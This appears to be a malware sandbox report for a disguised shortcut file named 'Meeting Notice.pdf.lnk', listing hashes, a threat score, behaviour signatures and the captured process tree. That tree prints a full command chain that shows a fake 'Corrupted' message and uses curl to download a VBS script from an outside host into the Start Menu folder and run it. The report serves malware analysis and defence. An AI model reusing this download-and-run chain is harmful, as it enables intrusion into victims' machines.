Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

1

Meeting No...df.lnk

windows7-x64

3

Meeting No...df.lnk

windows10-2004-x64

7

Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/01/2024, 02:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Meeting Notice.pdf.lnk

  • Size

    2KB

  • MD5

    6d7ef2269e65ddbf8c2bbdd2fbf75882

  • SHA1

    3181a05a32bdc7e122f998370dc70fa36270caba

  • SHA256

    408292710999abc4d37f23a6672ef407d70ffb4dc2e3e030a5ec705735c1f8bd

  • SHA512

    aab16a284ed892e190b7f3153242bfba4b35d73228f83da01be749453b2837004d1bb27aedda7b1e9e922ded212d4c0a311867b315a17902f5aa337f26556b3d

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Meeting Notice.pdf.lnk"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3820
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" --headless cmd /c msg * "Corrupted" & curl --insecure http://adamsresearchshare.com/textcmd/cmd1.php -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\winegt.vbs" & "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\winegt.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3988
      • C:\Windows\System32\cmd.exe
        cmd /c msg * Corrupted & curl --insecure http://adamsresearchshare.com/textcmd/cmd1.php -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\winegt.vbs" & "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\winegt.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4516
        • C:\Windows\system32\msg.exe
          msg * Corrupted
          4⤵
            PID:4736
          • C:\Windows\system32\curl.exe
            curl --insecure http://adamsresearchshare.com/textcmd/cmd1.php -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\winegt.vbs"
            4⤵
              PID:2060

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads